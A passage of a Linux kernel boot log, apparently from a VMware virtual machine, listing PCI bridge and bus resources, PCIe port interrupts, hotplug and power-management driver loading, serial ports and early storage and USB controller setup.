0xcaf00000-0xcaffffff] 439 | [ 4.772247] pci 0000:00:18.2: bridge window [mem 0xd9500000-0xd95fffff 64bit pref] 440 | [ 4.772292] pci 0000:00:18.3: PCI bridge to [bus 1e] 441 | [ 4.772337] pci 0000:00:18.3: bridge window [mem 0xcb300000-0xcb3fffff] 442 | [ 4.772371] pci 0000:00:18.3: bridge window [mem 0xd9900000-0xd99fffff 64bit pref] 443 | [ 4.772416] pci 0000:00:18.4: PCI bridge to [bus 1f] 444 | [ 4.772461] pci 0000:00:18.4: bridge window [mem 0xcb700000-0xcb7fffff] 445 | [ 4.772495] pci 0000:00:18.4: bridge window [mem 0xd9d00000-0xd9dfffff 64bit pref] 446 | [ 4.772540] pci 0000:00:18.5: PCI bridge to [bus 20] 447 | [ 4.772585] pci 0000:00:18.5: bridge window [mem 0xcbb00000-0xcbbfffff] 448 | [ 4.772618] pci 0000:00:18.5: bridge window [mem 0xda100000-0xda1fffff 64bit pref] 449 | [ 4.772663] pci 0000:00:18.6: PCI bridge to [bus 21] 450 | [ 4.772708] pci 0000:00:18.6: bridge window [mem 0xcbf00000-0xcbffffff] 451 | [ 4.772740] pci 0000:00:18.6: bridge window [mem 0xda500000-0xda5fffff 64bit pref] 452 | [ 4.772785] pci 0000:00:18.7: PCI bridge to [bus 22] 453 | [ 4.772830] pci 0000:00:18.7: bridge window [mem 0xcc300000-0xcc3fffff] 454 | [ 4.772864] pci 0000:00:18.7: bridge window [mem 0xda900000-0xda9fffff 64bit pref] 455 | [ 4.772909] pci 0000:00:01.0: setting latency timer to 64 456 | [ 4.775416] pci_bus 0000:00: resource 4 [mem 0x000a0000-0x000bffff] 457 | [ 4.775441] pci_bus 0000:00: resource 5 [mem 0x000cc000-0x000cffff] 458 | [ 4.775450] pci_bus 0000:00: resource 6 [mem 0x000d0000-0x000d3fff] 459 | [ 4.775458] pci_bus 0000:00: resource 7 [mem 0x000d4000-0x000d7fff] 460 | [ 4.775465] pci_bus 0000:00: resource 8 [mem 0x000d8000-0x000dbfff] 461 | [ 4.775473] pci_bus 0000:00: resource 9 [mem 0xc0000000-0xfebfffff] 462 | [ 4.775482] pci_bus 0000:00: resource 10 [io 0x0000-0x0cf7] 463 | [ 4.775508] pci_bus 0000:00: resource 11 [io 0x0d00-0xfeff] 464 | [ 4.775553] pci_bus 0000:02: resource 0 [io 0x2000-0x3fff] 465 | [ 4.775563] pci_bus 0000:02: resource 1 [mem 0xc9000000-0xca3fffff] 466 | [ 4.775572] pci_bus 0000:02: resource 2 [mem 0xd8400000-0xd89fffff 64bit pref] 467 | [ 4.775581] pci_bus 0000:02: resource 4 [mem 0x000a0000-0x000bffff] 468 | [ 4.775588] pci_bus 0000:02: resource 5 [mem 0x000cc000-0x000cffff] 469 | [ 4.775596] pci_bus 0000:02: resource 6 [mem 0x000d0000-0x000d3fff] 470 | [ 4.775604] pci_bus 0000:02: resource 7 [mem 0x000d4000-0x000d7fff] 471 | [ 4.775612] pci_bus 0000:02: resource 8 [mem 0x000d8000-0x000dbfff] 472 | [ 4.775620] pci_bus 0000:02: resource 9 [mem 0xc0000000-0xfebfffff] 473 | [ 4.775627] pci_bus 0000:02: resource 10 [io 0x0000-0x0cf7] 474 | [ 4.775635] pci_bus 0000:02: resource 11 [io 0x0d00-0xfeff] 475 | [ 4.775646] pci_bus 0000:03: resource 0 [io 0x4000-0x4fff] 476 | [ 4.775654] pci_bus 0000:03: resource 1 [mem 0xca400000-0xca4fffff] 477 | [ 4.775662] pci_bus 0000:03: resource 2 [mem 0xd8a00000-0xd8afffff 64bit pref] 478 | [ 4.775671] pci_bus 0000:04: resource 0 [io 0x8000-0x8fff] 479 | [ 4.775679] pci_bus 0000:04: resource 1 [mem 0xca800000-0xca8fffff] 480 | [ 4.775687] pci_bus 0000:04: resource 2 [mem 0xd8e00000-0xd8efffff 64bit pref] 481 | [ 4.775696] pci_bus 0000:05: resource 0 [io 0xc000-0xcfff] 482 | [ 4.775703] pci_bus 0000:05: resource 1 [mem 0xcac00000-0xcacfffff] 483 | [ 4.775711] pci_bus 0000:05: resource 2 [mem 0xd9200000-0xd92fffff 64bit pref] 484 | [ 4.775720] pci_bus 0000:06: resource 1 [mem 0xcb000000-0xcb0fffff] 485 | [ 4.775728] pci_bus 0000:06: resource 2 [mem 0xd9600000-0xd96fffff 64bit pref] 486 | [ 4.775738] pci_bus 0000:07: resource 1 [mem 0xcb400000-0xcb4fffff] 487 | [ 4.775746] pci_bus 0000:07: resource 2 [mem 0xd9a00000-0xd9afffff 64bit pref] 488 | [ 4.775755] pci_bus 0000:08: resource 1 [mem 0xcb800000-0xcb8fffff] 489 | [ 4.775763] pci_bus 0000:08: resource 2 [mem 0xd9e00000-0xd9efffff 64bit pref] 490 | [ 4.775772] pci_bus 0000:09: resource 1 [mem 0xcbc00000-0xcbcfffff] 491 | [ 4.775780] pci_bus 0000:09: resource 2 [mem 0xda200000-0xda2fffff 64bit pref] 492 | [ 4.775789] pci_bus 0000:0a: resource 1 [mem 0xcc000000-0xcc0fffff] 493 | [ 4.775797] pci_bus 0000:0a: resource 2 [mem 0xda600000-0xda6fffff 64bit pref] 494 | [ 4.775806] pci_bus 0000:0b: resource 0 [io 0x5000-0x5fff] 495 | [ 4.775814] pci_bus 0000:0b: resource 1 [mem 0xca500000-0xca5fffff] 496 | [ 4.775822] pci_bus 0000:0b: resource 2 [mem 0xd8b00000-0xd8bfffff 64bit pref] 497 | [ 4.775831] pci_bus 0000:0c: resource 0 [io 0x9000-0x9fff] 498 | [ 4.775839] pci_bus 0000:0c: resource 1 [mem 0xca900000-0xca9fffff] 499 | [ 4.775851] pci_bus 0000:0c: resource 2 [mem 0xd8f00000-0xd8ffffff 64bit pref] 500 | [ 4.775861] pci_bus 0000:0d: resource 0 [io 0xd000-0xdfff] 501 | [ 4.775869] pci_bus 0000:0d: resource 1 [mem 0xcad00000-0xcadfffff] 502 | [ 4.775877] pci_bus 0000:0d: resource 2 [mem 0xd9300000-0xd93fffff 64bit pref] 503 | [ 4.775886] pci_bus 0000:0e: resource 1 [mem 0xcb100000-0xcb1fffff] 504 | [ 4.775894] pci_bus 0000:0e: resource 2 [mem 0xd9700000-0xd97fffff 64bit pref] 505 | [ 4.775903] pci_bus 0000:0f: resource 1 [mem 0xcb500000-0xcb5fffff] 506 | [ 4.775911] pci_bus 0000:0f: resource 2 [mem 0xd9b00000-0xd9bfffff 64bit pref] 507 | [ 4.775920] pci_bus 0000:10: resource 1 [mem 0xcb900000-0xcb9fffff] 508 | [ 4.775928] pci_bus 0000:10: resource 2 [mem 0xd9f00000-0xd9ffffff 64bit pref] 509 | [ 4.775936] pci_bus 0000:11: resource 1 [mem 0xcbd00000-0xcbdfffff] 510 | [ 4.775944] pci_bus 0000:11: resource 2 [mem 0xda300000-0xda3fffff 64bit pref] 511 | [ 4.775953] pci_bus 0000:12: resource 1 [mem 0xcc100000-0xcc1fffff] 512 | [ 4.775961] pci_bus 0000:12: resource 2 [mem 0xda700000-0xda7fffff 64bit pref] 513 | [ 4.775970] pci_bus 0000:13: resource 0 [io 0x6000-0x6fff] 514 | [ 4.775978] pci_bus 0000:13: resource 1 [mem 0xca600000-0xca6fffff] 515 | [ 4.775986] pci_bus 0000:13: resource 2 [mem 0xd8c00000-0xd8cfffff 64bit pref] 516 | [ 4.775995] pci_bus 0000:14: resource 0 [io 0xa000-0xafff] 517 | [ 4.776002] pci_bus 0000:14: resource 1 [mem 0xcaa00000-0xcaafffff] 518 | [ 4.776011] pci_bus 0000:14: resource 2 [mem 0xd9000000-0xd90fffff 64bit pref] 519 | [ 4.776019] pci_bus 0000:15: resource 0 [io 0xe000-0xefff] 520 | [ 4.776027] pci_bus 0000:15: resource 1 [mem 0xcae00000-0xcaefffff] 521 | [ 4.776035] pci_bus 0000:15: resource 2 [mem 0xd9400000-0xd94fffff 64bit pref] 522 | [ 4.776043] pci_bus 0000:16: resource 1 [mem 0xcb200000-0xcb2fffff] 523 | [ 4.776051] pci_bus 0000:16: resource 2 [mem 0xd9800000-0xd98fffff 64bit pref] 524 | [ 4.776060] pci_bus 0000:17: resource 1 [mem 0xcb600000-0xcb6fffff] 525 | [ 4.776068] pci_bus 0000:17: resource 2 [mem 0xd9c00000-0xd9cfffff 64bit pref] 526 | [ 4.776077] pci_bus 0000:18: resource 1 [mem 0xcba00000-0xcbafffff] 527 | [ 4.776085] pci_bus 0000:18: resource 2 [mem 0xda000000-0xda0fffff 64bit pref] 528 | [ 4.776094] pci_bus 0000:19: resource 1 [mem 0xcbe00000-0xcbefffff] 529 | [ 4.776102] pci_bus 0000:19: resource 2 [mem 0xda400000-0xda4fffff 64bit pref] 530 | [ 4.776111] pci_bus 0000:1a: resource 1 [mem 0xcc200000-0xcc2fffff] 531 | [ 4.776119] pci_bus 0000:1a: resource 2 [mem 0xda800000-0xda8fffff 64bit pref] 532 | [ 4.776128] pci_bus 0000:1b: resource 0 [io 0x7000-0x7fff] 533 | [ 4.776135] pci_bus 0000:1b: resource 1 [mem 0xca700000-0xca7fffff] 534 | [ 4.776146] pci_bus 0000:1b: resource 2 [mem 0xd8d00000-0xd8dfffff 64bit pref] 535 | [ 4.776156] pci_bus 0000:1c: resource 0 [io 0xb000-0xbfff] 536 | [ 4.776163] pci_bus 0000:1c: resource 1 [mem 0xcab00000-0xcabfffff] 537 | [ 4.776172] pci_bus 0000:1c: resource 2 [mem 0xd9100000-0xd91fffff 64bit pref] 538 | [ 4.776180] pci_bus 0000:1d: resource 1 [mem 0xcaf00000-0xcaffffff] 539 | [ 4.776188] pci_bus 0000:1d: resource 2 [mem 0xd9500000-0xd95fffff 64bit pref] 540 | [ 4.776197] pci_bus 0000:1e: resource 1 [mem 0xcb300000-0xcb3fffff] 541 | [ 4.776205] pci_bus 0000:1e: resource 2 [mem 0xd9900000-0xd99fffff 64bit pref] 542 | [ 4.776213] pci_bus 0000:1f: resource 1 [mem 0xcb700000-0xcb7fffff] 543 | [ 4.776221] pci_bus 0000:1f: resource 2 [mem 0xd9d00000-0xd9dfffff 64bit pref] 544 | [ 4.776230] pci_bus 0000:20: resource 1 [mem 0xcbb00000-0xcbbfffff] 545 | [ 4.776238] pci_bus 0000:20: resource 2 [mem 0xda100000-0xda1fffff 64bit pref] 546 | [ 4.776247] pci_bus 0000:21: resource 1 [mem 0xcbf00000-0xcbffffff] 547 | [ 4.776255] pci_bus 0000:21: resource 2 [mem 0xda500000-0xda5fffff 64bit pref] 548 | [ 4.776264] pci_bus 0000:22: resource 1 [mem 0xcc300000-0xcc3fffff] 549 | [ 4.776272] pci_bus 0000:22: resource 2 [mem 0xda900000-0xda9fffff 64bit pref] 550 | [ 4.776317] NET: Registered protocol family 2 551 | [ 4.779410] TCP established hash table entries: 8192 (order: 4, 65536 bytes) 552 | [ 4.779455] TCP bind hash table entries: 8192 (order: 4, 65536 bytes) 553 | [ 4.779500] TCP: Hash tables configured (established 8192 bind 8192) 554 | [ 4.783406] TCP: reno registered 555 | [ 4.783451] UDP hash table entries: 512 (order: 2, 16384 bytes) 556 | [ 4.783496] UDP-Lite hash table entries: 512 (order: 2, 16384 bytes) 557 | [ 4.783541] NET: Registered protocol family 1 558 | [ 4.783586] pci 0000:00:00.0: Limiting direct PCI/PCI transfers 559 | [ 4.783632] pci 0000:00:0f.0: Boot video device 560 | [ 4.783727] PCI: CLS 32 bytes, default 64 561 | [ 4.791409] Trying to unpack rootfs image as initramfs... 562 | [ 5.362854] Freeing initrd memory: 15500k freed 563 | [ 5.370789] Simple Boot Flag at 0x36 set to 0x1 564 | [ 5.370879] Switching to clocksource tsc 565 | [ 5.371292] Initialise module verification 566 | [ 5.371382] audit: initializing netlink socket (disabled) 567 | [ 5.371471] type=2000 audit(1400072020.504:1): initialized 568 | [ 5.415433] bounce pool size: 64 pages 569 | [ 5.415523] HugeTLB registered 2 MB page size, pre-allocated 0 pages 570 | [ 5.419430] VFS: Disk quotas dquot_6.5.2 571 | [ 5.419520] Dquot-cache hash table entries: 1024 (order 0, 4096 bytes) 572 | [ 5.423074] fuse init (API version 7.20) 573 | [ 5.423271] msgmni has been set to 1738 574 | [ 5.425454] Key type asymmetric registered 575 | [ 5.425543] Asymmetric key parser 'x509' registered 576 | [ 5.425633] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 252) 577 | [ 5.425830] io scheduler noop registered 578 | [ 5.425909] io scheduler deadline registered (default) 579 | [ 5.425998] io scheduler cfq registered 580 | [ 5.430758] pcieport 0000:00:15.0: irq 40 for MSI/MSI-X 581 | [ 5.434749] pcieport 0000:00:15.1: irq 41 for MSI/MSI-X 582 | [ 5.434839] pcieport 0000:00:15.2: irq 42 for MSI/MSI-X 583 | [ 5.434928] pcieport 0000:00:15.3: irq 43 for MSI/MSI-X 584 | [ 5.435018] pcieport 0000:00:15.4: irq 44 for MSI/MSI-X 585 | [ 5.435108] pcieport 0000:00:15.5: irq 45 for MSI/MSI-X 586 | [ 5.435197] pcieport 0000:00:15.6: irq 46 for MSI/MSI-X 587 | [ 5.438662] pcieport 0000:00:15.7: irq 47 for MSI/MSI-X 588 | [ 5.438751] pcieport 0000:00:16.0: irq 48 for MSI/MSI-X 589 | [ 5.438841] pcieport 0000:00:16.1: irq 49 for MSI/MSI-X 590 | [ 5.438931] pcieport 0000:00:16.2: irq 50 for MSI/MSI-X 591 | [ 5.439020] pcieport 0000:00:16.3: irq 51 for MSI/MSI-X 592 | [ 5.439110] pcieport 0000:00:16.4: irq 52 for MSI/MSI-X 593 | [ 5.439200] pcieport 0000:00:16.5: irq 53 for MSI/MSI-X 594 | [ 5.439289] pcieport 0000:00:16.6: irq 54 for MSI/MSI-X 595 | [ 5.439379] pcieport 0000:00:16.7: irq 55 for MSI/MSI-X 596 | [ 5.439469] pcieport 0000:00:17.0: irq 56 for MSI/MSI-X 597 | [ 5.439558] pcieport 0000:00:17.1: irq 57 for MSI/MSI-X 598 | [ 5.439648] pcieport 0000:00:17.2: irq 58 for MSI/MSI-X 599 | [ 5.439738] pcieport 0000:00:17.3: irq 59 for MSI/MSI-X 600 | [ 5.439827] pcieport 0000:00:17.4: irq 60 for MSI/MSI-X 601 | [ 5.439917] pcieport 0000:00:17.5: irq 61 for MSI/MSI-X 602 | [ 5.440007] pcieport 0000:00:17.6: irq 62 for MSI/MSI-X 603 | [ 5.440096] pcieport 0000:00:17.7: irq 63 for MSI/MSI-X 604 | [ 5.440186] pcieport 0000:00:18.0: irq 64 for MSI/MSI-X 605 | [ 5.440276] pcieport 0000:00:18.1: irq 65 for MSI/MSI-X 606 | [ 5.440366] pcieport 0000:00:18.2: irq 66 for MSI/MSI-X 607 | [ 5.440455] pcieport 0000:00:18.3: irq 67 for MSI/MSI-X 608 | [ 5.440545] pcieport 0000:00:18.4: irq 68 for MSI/MSI-X 609 | [ 5.440635] pcieport 0000:00:18.5: irq 69 for MSI/MSI-X 610 | [ 5.440724] pcieport 0000:00:18.6: irq 70 for MSI/MSI-X 611 | [ 5.442820] pcieport 0000:00:18.7: irq 71 for MSI/MSI-X 612 | [ 5.442910] pcieport 0000:00:15.0: Signaling PME through PCIe PME interrupt 613 | [ 5.442999] pcie_pme 0000:00:15.0:pcie01: service driver pcie_pme loaded 614 | [ 5.443089] pcieport 0000:00:15.1: Signaling PME through PCIe PME interrupt 615 | [ 5.443125] pcie_pme 0000:00:15.1:pcie01: service driver pcie_pme loaded 616 | [ 5.443214] pcieport 0000:00:15.2: Signaling PME through PCIe PME interrupt 617 | [ 5.443248] pcie_pme 0000:00:15.2:pcie01: service driver pcie_pme loaded 618 | [ 5.443338] pcieport 0000:00:15.3: Signaling PME through PCIe PME interrupt 619 | [ 5.443372] pcie_pme 0000:00:15.3:pcie01: service driver pcie_pme loaded 620 | [ 5.443462] pcieport 0000:00:15.4: Signaling PME through PCIe PME interrupt 621 | [ 5.443496] pcie_pme 0000:00:15.4:pcie01: service driver pcie_pme loaded 622 | [ 5.443586] pcieport 0000:00:15.5: Signaling PME through PCIe PME interrupt 623 | [ 5.443621] pcie_pme 0000:00:15.5:pcie01: service driver pcie_pme loaded 624 | [ 5.443711] pcieport 0000:00:15.6: Signaling PME through PCIe PME interrupt 625 | [ 5.443745] pcie_pme 0000:00:15.6:pcie01: service driver pcie_pme loaded 626 | [ 5.443835] pcieport 0000:00:15.7: Signaling PME through PCIe PME interrupt 627 | [ 5.443869] pcie_pme 0000:00:15.7:pcie01: service driver pcie_pme loaded 628 | [ 5.443959] pcieport 0000:00:16.0: Signaling PME through PCIe PME interrupt 629 | [ 5.443993] pcie_pme 0000:00:16.0:pcie01: service driver pcie_pme loaded 630 | [ 5.444083] pcieport 0000:00:16.1: Signaling PME through PCIe PME interrupt 631 | [ 5.444119] pcie_pme 0000:00:16.1:pcie01: service driver pcie_pme loaded 632 | [ 5.444209] pcieport 0000:00:16.2: Signaling PME through PCIe PME interrupt 633 | [ 5.444243] pcie_pme 0000:00:16.2:pcie01: service driver pcie_pme loaded 634 | [ 5.444333] pcieport 0000:00:16.3: Signaling PME through PCIe PME interrupt 635 | [ 5.444367] pcie_pme 0000:00:16.3:pcie01: service driver pcie_pme loaded 636 | [ 5.444457] pcieport 0000:00:16.4: Signaling PME through PCIe PME interrupt 637 | [ 5.444491] pcie_pme 0000:00:16.4:pcie01: service driver pcie_pme loaded 638 | [ 5.444581] pcieport 0000:00:16.5: Signaling PME through PCIe PME interrupt 639 | [ 5.444616] pcie_pme 0000:00:16.5:pcie01: service driver pcie_pme loaded 640 | [ 5.444705] pcieport 0000:00:16.6: Signaling PME through PCIe PME interrupt 641 | [ 5.444744] pcie_pme 0000:00:16.6:pcie01: service driver pcie_pme loaded 642 | [ 5.444834] pcieport 0000:00:16.7: Signaling PME through PCIe PME interrupt 643 | [ 5.444868] pcie_pme 0000:00:16.7:pcie01: service driver pcie_pme loaded 644 | [ 5.444958] pcieport 0000:00:17.0: Signaling PME through PCIe PME interrupt 645 | [ 5.444994] pcie_pme 0000:00:17.0:pcie01: service driver pcie_pme loaded 646 | [ 5.445084] pcieport 0000:00:17.1: Signaling PME through PCIe PME interrupt 647 | [ 5.445119] pcie_pme 0000:00:17.1:pcie01: service driver pcie_pme loaded 648 | [ 5.445208] pcieport 0000:00:17.2: Signaling PME through PCIe PME interrupt 649 | [ 5.445243] pcie_pme 0000:00:17.2:pcie01: service driver pcie_pme loaded 650 | [ 5.445333] pcieport 0000:00:17.3: Signaling PME through PCIe PME interrupt 651 | [ 5.445368] pcie_pme 0000:00:17.3:pcie01: service driver pcie_pme loaded 652 | [ 5.445457] pcieport 0000:00:17.4: Signaling PME through PCIe PME interrupt 653 | [ 5.445493] pcie_pme 0000:00:17.4:pcie01: service driver pcie_pme loaded 654 | [ 5.445583] pcieport 0000:00:17.5: Signaling PME through PCIe PME interrupt 655 | [ 5.445617] pcie_pme 0000:00:17.5:pcie01: service driver pcie_pme loaded 656 | [ 5.445707] pcieport 0000:00:17.6: Signaling PME through PCIe PME interrupt 657 | [ 5.445741] pcie_pme 0000:00:17.6:pcie01: service driver pcie_pme loaded 658 | [ 5.445831] pcieport 0000:00:17.7: Signaling PME through PCIe PME interrupt 659 | [ 5.445865] pcie_pme 0000:00:17.7:pcie01: service driver pcie_pme loaded 660 | [ 5.445955] pcieport 0000:00:18.0: Signaling PME through PCIe PME interrupt 661 | [ 5.445990] pcie_pme 0000:00:18.0:pcie01: service driver pcie_pme loaded 662 | [ 5.446079] pcieport 0000:00:18.1: Signaling PME through PCIe PME interrupt 663 | [ 5.446114] pcie_pme 0000:00:18.1:pcie01: service driver pcie_pme loaded 664 | [ 5.446204] pcieport 0000:00:18.2: Signaling PME through PCIe PME interrupt 665 | [ 5.446239] pcie_pme 0000:00:18.2:pcie01: service driver pcie_pme loaded 666 | [ 5.446329] pcieport 0000:00:18.3: Signaling PME through PCIe PME interrupt 667 | [ 5.446363] pcie_pme 0000:00:18.3:pcie01: service driver pcie_pme loaded 668 | [ 5.446453] pcieport 0000:00:18.4: Signaling PME through PCIe PME interrupt 669 | [ 5.446487] pcie_pme 0000:00:18.4:pcie01: service driver pcie_pme loaded 670 | [ 5.446677] pcieport 0000:00:18.5: Signaling PME through PCIe PME interrupt 671 | [ 5.446712] pcie_pme 0000:00:18.5:pcie01: service driver pcie_pme loaded 672 | [ 5.446802] pcieport 0000:00:18.6: Signaling PME through PCIe PME interrupt 673 | [ 5.446836] pcie_pme 0000:00:18.6:pcie01: service driver pcie_pme loaded 674 | [ 5.446926] pcieport 0000:00:18.7: Signaling PME through PCIe PME interrupt 675 | [ 5.446961] pcie_pme 0000:00:18.7:pcie01: service driver pcie_pme loaded 676 | [ 5.447051] pci_hotplug: PCI Hot Plug PCI Core version: 0.5 677 | [ 5.447141] pciehp 0000:00:15.0:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 678 | [ 5.447230] pciehp 0000:00:15.0:pcie04: service driver pciehp loaded 679 | [ 5.447320] pciehp 0000:00:15.1:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 680 | [ 5.447410] pciehp 0000:00:15.1:pcie04: service driver pciehp loaded 681 | [ 5.447499] pciehp 0000:00:15.2:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 682 | [ 5.447588] pciehp 0000:00:15.2:pcie04: service driver pciehp loaded 683 | [ 5.447678] pciehp 0000:00:15.3:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 684 | [ 5.447768] pciehp 0000:00:15.3:pcie04: service driver pciehp loaded 685 | [ 5.450720] pciehp 0000:00:15.4:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 686 | [ 5.450833] pciehp 0000:00:15.4:pcie04: service driver pciehp loaded 687 | [ 5.450922] pciehp 0000:00:15.5:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 688 | [ 5.451012] pciehp 0000:00:15.5:pcie04: service driver pciehp loaded 689 | [ 5.451102] pciehp 0000:00:15.6:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 690 | [ 5.451191] pciehp 0000:00:15.6:pcie04: service driver pciehp loaded 691 | [ 5.451281] pciehp 0000:00:15.7:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 692 | [ 5.451371] pciehp 0000:00:15.7:pcie04: service driver pciehp loaded 693 | [ 5.451458] pciehp 0000:00:16.0:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 694 | [ 5.451548] pciehp 0000:00:16.0:pcie04: service driver pciehp loaded 695 | [ 5.451635] pciehp 0000:00:16.1:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 696 | [ 5.451725] pciehp 0000:00:16.1:pcie04: service driver pciehp loaded 697 | [ 5.451812] pciehp 0000:00:16.2:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 698 | [ 5.451901] pciehp 0000:00:16.2:pcie04: service driver pciehp loaded 699 | [ 5.451991] pciehp 0000:00:16.3:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 700 | [ 5.452081] pciehp 0000:00:16.3:pcie04: service driver pciehp loaded 701 | [ 5.452168] pciehp 0000:00:16.4:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 702 | [ 5.452258] pciehp 0000:00:16.4:pcie04: service driver pciehp loaded 703 | [ 5.452344] pciehp 0000:00:16.5:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 704 | [ 5.452434] pciehp 0000:00:16.5:pcie04: service driver pciehp loaded 705 | [ 5.452520] pciehp 0000:00:16.6:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 706 | [ 5.452610] pciehp 0000:00:16.6:pcie04: service driver pciehp loaded 707 | [ 5.452697] pciehp 0000:00:16.7:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 708 | [ 5.452787] pciehp 0000:00:16.7:pcie04: service driver pciehp loaded 709 | [ 5.452876] pciehp 0000:00:17.0:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 710 | [ 5.452966] pciehp 0000:00:17.0:pcie04: service driver pciehp loaded 711 | [ 5.453056] pciehp 0000:00:17.1:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 712 | [ 5.453145] pciehp 0000:00:17.1:pcie04: service driver pciehp loaded 713 | [ 5.453233] pciehp 0000:00:17.2:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 714 | [ 5.453322] pciehp 0000:00:17.2:pcie04: service driver pciehp loaded 715 | [ 5.453408] pciehp 0000:00:17.3:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 716 | [ 5.453498] pciehp 0000:00:17.3:pcie04: service driver pciehp loaded 717 | [ 5.453585] pciehp 0000:00:17.4:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 718 | [ 5.453675] pciehp 0000:00:17.4:pcie04: service driver pciehp loaded 719 | [ 5.453761] pciehp 0000:00:17.5:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 720 | [ 5.453851] pciehp 0000:00:17.5:pcie04: service driver pciehp loaded 721 | [ 5.453938] pciehp 0000:00:17.6:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 722 | [ 5.454028] pciehp 0000:00:17.6:pcie04: service driver pciehp loaded 723 | [ 5.454115] pciehp 0000:00:17.7:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 724 | [ 5.454205] pciehp 0000:00:17.7:pcie04: service driver pciehp loaded 725 | [ 5.454293] pciehp 0000:00:18.0:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 726 | [ 5.454382] pciehp 0000:00:18.0:pcie04: service driver pciehp loaded 727 | [ 5.454468] pciehp 0000:00:18.1:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 728 | [ 5.454602] pciehp 0000:00:18.1:pcie04: service driver pciehp loaded 729 | [ 5.454689] pciehp 0000:00:18.2:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 730 | [ 5.454779] pciehp 0000:00:18.2:pcie04: service driver pciehp loaded 731 | [ 5.454866] pciehp 0000:00:18.3:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 732 | [ 5.454956] pciehp 0000:00:18.3:pcie04: service driver pciehp loaded 733 | [ 5.455043] pciehp 0000:00:18.4:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 734 | [ 5.455132] pciehp 0000:00:18.4:pcie04: service driver pciehp loaded 735 | [ 5.455218] pciehp 0000:00:18.5:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 736 | [ 5.455308] pciehp 0000:00:18.5:pcie04: service driver pciehp loaded 737 | [ 5.455394] pciehp 0000:00:18.6:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 738 | [ 5.455484] pciehp 0000:00:18.6:pcie04: service driver pciehp loaded 739 | [ 5.455571] pciehp 0000:00:18.7:pcie04: HPC vendor_id 15ad device_id 7a0 ss_vid 15ad ss_did 7a0 740 | [ 5.455660] pciehp 0000:00:18.7:pcie04: service driver pciehp loaded 741 | [ 5.455726] pciehp: PCI Express Hot Plug Controller Driver version: 0.4 742 | [ 5.455816] intel_idle: does not run on family 6 model 23 743 | [ 5.455961] ACPI: AC Adapter [ACAD] (on-line) 744 | [ 5.456320] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input0 745 | [ 5.456410] ACPI: Power Button [PWRF] 746 | [ 5.550802] GHES: HEST is not enabled! 747 | [ 5.551071] Serial: 8250/16550 driver, 32 ports, IRQ sharing enabled 748 | [ 5.574462] 00:09: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A 749 | [ 5.574695] isapnp: Scanning for PnP cards... 750 | [ 5.646244] 00:0a: ttyS1 at I/O 0x2f8 (irq = 3) is a 16550A 751 | [ 5.650681] Linux agpgart interface v0.103 752 | [ 5.698363] agpgart-intel 0000:00:00.0: Intel 440BX Chipset 753 | [ 5.698616] agpgart-intel 0000:00:00.0: AGP aperture is 256M @ 0x0 754 | [ 5.704908] brd: module loaded 755 | [ 5.707727] loop: module loaded 756 | [ 5.710294] ata_piix 0000:00:07.1: version 2.13 757 | [ 5.726493] scsi0 : ata_piix 758 | [ 5.726812] scsi1 : ata_piix 759 | [ 5.726896] ata1: PATA max UDMA/33 cmd 0x1f0 ctl 0x3f6 bmdma 0x10c0 irq 14 760 | [ 5.726948] ata2: PATA max UDMA/33 cmd 0x170 ctl 0x376 bmdma 0x10c8 irq 15 761 | [ 5.730418] libphy: Fixed MDIO Bus: probed 762 | [ 5.730502] tun: Universal TUN/TAP device driver, 1.6 763 | [ 5.730528] tun: (C) 1999-2004 Max Krasnyansky 764 | [ 5.730781] PPP generic driver version 2.4.2 765 | [ 5.734707] ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver 766 | [ 5.734773] ehci-pci: EHCI PCI platform driver 767 | [ 5.734858] ehci-pci 0000:02:03.0: EHCI Host Controller 768 | [ 5.734942] ehci-pci 0000:02:03.0: new USB bus registered, assigned bus number 1 769 | [ 5.738606] ehci-pci 0000:02:03.0: cache line size of 32 is not supported 770 | [ 5.738691] ehci-pci 